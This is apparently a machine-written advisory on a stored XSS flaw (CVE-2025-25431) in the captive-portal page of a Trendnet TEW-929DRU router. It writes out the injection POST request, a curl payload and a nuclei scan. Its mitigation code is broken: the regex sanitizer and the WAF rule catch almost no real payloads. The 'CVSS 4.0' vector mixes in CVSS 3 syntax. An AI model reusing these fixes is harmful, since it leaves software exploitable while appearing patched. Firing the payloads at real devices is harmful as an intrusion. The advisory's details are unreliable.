How the CVE Works:
CVE-2025-25431 is a stored XSS vulnerability in Trendnet TEW-929DRU firmware version 1.0.0.10. The flaw exists in the `/captive_portal.htm` page, where the `wifi_data` parameter’s `ssid` key fails to sanitize user-supplied input. An attacker can inject malicious JavaScript payloads into the SSID field, which are then stored and executed when an administrator views the captive portal configuration. This allows persistent script execution in the context of the router’s management interface, potentially leading to session hijacking, credential theft, or device compromise.
DailyCVE Form:
Platform: Trendnet TEW-929DRU
Version: 1.0.0.10
Vulnerability: Stored XSS
Severity: Medium
Date: 04/30/2025
What Undercode Say:
Exploitation:
1. Payload Injection:
POST /captive_portal.htm HTTP/1.1
Host: <router_ip>
wifi_data={"ssid":"<script>alert(1)</script>"}
2. Trigger Execution:
Navigate to `/captive_portal.htm` to execute the stored payload.
Detection:
1. Manual Testing:
curl -X POST -d 'wifi_data={"ssid":"<img src=x onerror=alert(1)>"}' http://<router_ip>/captive_portal.htm
2. Automated Scanning:
nuclei -t xss.yaml -u http://<router_ip>/captive_portal.htm
Mitigation:
1. Input Sanitization:
function sanitize(input) {
return input.replace(/<script.?>.?<\/script>/gi, '');
}
2. Firmware Update:
wget https://trendnet.com/firmware/TEW-929DRU_v1.0.0.11.bin
3. WAF Rules:
location /captive_portal.htm {
modsecurity_rules 'SecRule ARGS "@rx <script>" "id:1001,deny,status:403"';
}
Impact Analysis:
- CVSS 4.0: `CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N`
– Exploitability: Requires admin-level access to inject payloads.
References:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
